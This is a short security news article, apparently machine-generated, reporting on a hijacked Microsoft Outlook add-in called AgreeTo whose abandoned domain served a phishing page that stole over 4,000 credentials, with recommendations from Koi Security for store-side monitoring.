Ethical Hacking News
A malicious Microsoft Outlook add-in has been discovered stealing over 4,000 credentials from unsuspecting users. This attack highlights the need for increased vigilance and monitoring of Office add-ins, as well as the importance of supply chain security.
The malicious Microsoft Outlook add-in "AgreeTo" was discovered stealing over 4,000 credentials from unsuspecting users. The attack exploited a vulnerability in Office add-ins distributed through Microsoft's own store, which carry implicit trust. The incident highlights the need for increased vigilance and monitoring of Office add-ins due to their blind spots in manifest files that declare URLs. The lack of periodic content monitoring of published add-ins leaves Microsoft and its users vulnerable to exploitation. Similar attacks have been seen in browser extensions, npm packages, and IDE plugins, emphasizing the importance of supply chain security.
The recent discovery of a malicious Microsoft Outlook add-in has shed light on a previously unexplored vulnerability in the company's supply chain. The attacker, who claimed the domain associated with a now-abandoned legitimate add-in to serve a fake Microsoft login page, was able to steal over 4,000 credentials from unsuspecting users.
This incident highlights the need for increased vigilance and monitoring of Office add-ins, which are distributed through Microsoft's own store and carry implicit trust. The use of manifest files that declare URLs, which can be served in real-time from developer servers, creates a blind spot that malicious actors can exploit.
In this case, the malicious add-in, AgreeTo, was advertised by its developer as a way for users to connect different calendars in a single place and share their availability through email. The add-in was last updated in December 2022, but it appears that the developer abandoned the project, allowing an attacker to take control of the domain and serve a phishing kit.
The attack exploits the lack of periodic content monitoring of add-ins published to the Marketplace, leaving Microsoft and its users vulnerable to exploitation. This is not an isolated incident; similar attacks have been seen in browser extensions, npm packages, and IDE plugins.
The impact of this vulnerability goes beyond the individual user; it highlights a broader issue with supply chain security. As companies increasingly rely on remote dynamic dependencies, they must adopt a more proactive approach to monitoring and vetting add-ins and other software components.
Idan Dardikman, co-founder and CTO of Koi Security, warned that "this is the same class of attack we've seen in browser extensions, npm packages, and IDE plugins: a trusted distribution channel where the content can change after approval." He added that "what makes Office add-ins particularly concerning is the combination of factors: they run inside Outlook, where users handle their most sensitive communications, they can request permissions to read and modify emails, and they're distributed through Microsoft's own store, which carries implicit trust."
Microsoft has taken steps to address this vulnerability, including removing the malicious add-in from its store and advising affected users to remove it and reset their account passwords. However, the incident serves as a reminder that supply chain security is an ongoing challenge that requires continuous monitoring and vigilance.
In response to this incident, Koi Security recommends several steps that Microsoft can take to improve supply chain security:
* Trigger a re-review when an add-in's URL starts returning different content from what it was during review
* Verify ownership of the domain to ensure that it's managed by the add-in developer
* Implement a mechanism for delisting or flagging add-ins that have not been updated beyond a certain time period
* Display installation counts as a way to assess impact
These measures can help prevent similar attacks in the future and demonstrate Microsoft's commitment to protecting its users.
Summary:
A malicious Microsoft Outlook add-in, AgreeTo, was discovered stealing over 4,000 credentials from unsuspecting users. The attack exploited a vulnerability in Office add-ins, which are distributed through Microsoft's own store and carry implicit trust. The incident highlights the need for increased vigilance and monitoring of add-ins and demonstrates the importance of supply chain security.
Related Information:
https://www.ethicalhackingnews.com/articles/The-Lurking-Threat-of-Unattended-Office-Add-ins-A-Cautionary-Tale-of-Supply-Chain-Security-ehn.shtml
https://thehackernews.com/2026/02/first-malicious-outlook-add-in-found.html
https://www.bleepingcomputer.com/news/security/microsoft-store-outlook-add-in-hijacked-to-steal-4-000-microsoft-accounts/
Published: Wed Feb 18 17:52:41 2026 by llama3.2 3B Q4_K_M
